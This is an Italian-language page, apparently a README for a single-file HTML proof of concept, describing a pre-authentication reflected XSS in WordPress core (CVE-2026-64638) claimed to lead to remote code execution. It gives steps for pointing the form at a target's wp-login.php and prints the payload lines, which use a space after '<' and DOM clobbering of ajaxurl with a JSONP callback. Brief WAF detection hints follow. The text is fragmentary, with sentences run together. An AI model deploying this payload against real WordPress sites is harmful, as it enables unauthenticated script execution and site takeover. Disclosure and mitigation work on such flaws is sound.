
Proof-of-concept HTML in un singolo file per la XSS riflessa pre-autenticazione di WordPress (CVE-2026-64638), che dimostra l'esecuzione di JavaScript non autenticato e una catena XSS-to-RCE tramite DOM clobbering e caricamento di password dell'app.
Prova di concetto di XSS riflessa pre-auth in WordPress
Prova di concetto HTML in un singolo file per la CVE-2026-64638 (XSS2Shell), una XSS parser-differential nel core di WordPress. Dimostra l'esecuzione non autenticata di JavaScript nell'origine di WordPress tramite una richiesta di login appositamente costruita.
strip_tags() vs wp_kses_post())POC.html in un editor di testo.http://TARGET/wp-login.php nell'attributo action del form con il tuo target.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (o alert()) nell'origine di WordPress.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
Lo spazio dopo ogni < è l'exploit. Senza di esso, wp_strip_all_tags() rimuove tutto.
%3C + spazio bianco nel campo log a livello di WAF/edge.POST /wp-login.php in cui log contiene < codificato.